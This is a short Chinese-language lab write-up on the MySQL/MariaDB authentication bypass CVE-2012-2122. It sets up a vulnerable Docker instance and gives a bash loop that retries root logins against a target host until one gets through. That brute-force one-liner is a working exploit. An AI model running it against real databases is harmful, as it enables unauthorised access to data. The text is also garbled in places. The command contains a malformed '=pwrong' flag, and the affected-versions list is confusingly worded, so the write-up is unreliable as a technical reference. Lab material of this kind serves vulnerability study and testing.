Mysql身份绕过漏洞（CVE-2012-2122)

Mysql 身份认证绕过漏洞（CVE-2012-2122）

当连接MariaDB/MYSQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。

受影响版本：

• MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
• MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

环境搭建

cd mysql/CVE-2012-2122
docker-compose up -d
docker-compose config

环境启动后，将启动一个mysql服务（版本：5.5.23），监听3306端口，通过正常的mysql客服端，可以直接登录的，正确root密码是123456


连接成功！

漏洞验证

在不知道我们环境正确密码的情况下，在bash下运行如下命令，在一定数量尝试后便可成功登录：

for i  in `seq 1 1000`;do mysql -uroot =pwrong -h 10.10.10.10 -P3306;done

更多方法，自己体会！！！